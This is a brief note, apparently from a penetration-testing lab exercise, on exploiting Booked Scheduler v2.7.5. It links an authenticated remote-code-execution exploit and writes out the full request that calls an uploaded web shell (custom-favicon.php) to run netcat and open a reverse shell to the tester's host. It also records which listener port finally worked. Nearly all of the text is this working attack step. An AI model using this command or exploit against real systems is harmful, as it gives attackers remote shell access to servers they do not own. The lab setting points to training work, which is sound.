
Booked Scheduler v2.7.5
Found this authenticated exploit for RCE that doesn’t require MSF.
https://github.com/F-Masood/Booked-Scheduler-2.7.5---RCE-Without-MSF
this is the command used to initiate the reverse shell. I was using port 80 and 4444 but this kept failing. Finally changed the port to 8003 and it worked right away.:
http://192.168.104.64:8003/booked/Web/custom-favicon.php?cmd=nc+-e+/bin/sh+192.168.49.104+8003;